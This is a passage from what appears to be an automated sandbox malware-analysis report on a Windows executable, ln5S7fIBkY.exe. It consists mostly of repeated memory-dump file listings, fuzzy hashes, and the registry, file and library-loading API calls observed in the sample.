                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 334405425-0
                                                                    • Opcode ID: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
                                                                    • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                    • Opcode Fuzzy Hash: 7a25ddf71574e17a44a7b6d6d2d8623a607b9bc29b791e8d98a732f6a3ef313a
                                                                    • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(0040B5A8,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseValuelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2655323295-0
                                                                    • Opcode ID: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                    • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                    • Opcode Fuzzy Hash: 9ae16c367c641726b2c7cc81df632fbb5fa1d95dd1bb84893f35c5cbb6edaf58
                                                                    • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                    APIs
                                                                      • Part of subcall function 004065DA: FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004065E5
                                                                      • Part of subcall function 004065DA: FindClose.KERNELBASE(00000000), ref: 004065F1
                                                                    • lstrlenW.KERNEL32 ref: 00402299
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004022A4
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                    • String ID:
                                                                    • API String ID: 1486964399-0
                                                                    • Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                    • Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
                                                                    • Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                    • Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$CloseValue
                                                                    • String ID:
                                                                    • API String ID: 397863658-0
                                                                    • Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                    • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                    • Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                    • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3356406503-0
                                                                    • Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                    • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                    • Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                    • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                    • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                    • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                    • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                    APIs
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteValue
                                                                    • String ID:
                                                                    • API String ID: 2831762973-0
                                                                    • Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                    • Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
                                                                    • Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                    • Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 004053E2
                                                                      • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2896919175-0
                                                                    • Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                    • Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
                                                                    • Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                    • Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                    • Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
                                                                    • Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                    • Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                      • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                      • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                      • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                    • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                    • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                    • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
